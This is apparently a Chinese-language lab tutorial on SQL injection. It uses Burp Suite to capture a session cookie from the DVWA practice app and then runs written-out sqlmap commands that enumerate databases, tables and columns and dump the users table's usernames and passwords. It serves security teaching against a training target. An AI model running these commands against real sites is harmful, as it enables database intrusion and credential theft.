实验原理
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。
1.访问DVWA网站
1)访问dvwa,并登录。admin password
2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA网站的安全级别设为“Low”,并点击Submt
3)左侧菜单点击“SQL Injection”模块,进入SQL注入训练模块
2.利用Burpsuite工具抓包
1)启动Burpsuite并设置代理服务端口
2)设置Firefox代理
注意:端口要一致
3)开启 Burpsuite的代理拦截功能

4)利用Burpsuite工具拦截HTTP请求包
进入DVWA网站SQL注入训练模块,输入1,点击Submit,此时Burpsuite会拦截到HTTP请求包
将其中的cookie值拷贝下来,作为下一步为SQLMAP的 --cookie参数赋值
3.启动SQLMAP
进入sqlmap目录,在搜索框输入cmd,并回车
4.寻找注入点
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4"
检测结果
5.获取数据库的库名
1)获取所有数据库的库名
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs
2)获取当前数据库的库名
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db
6.获取dvwa数据库中所有的表名
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables
其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns
8.获取users表中user和password字段的全部值
python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump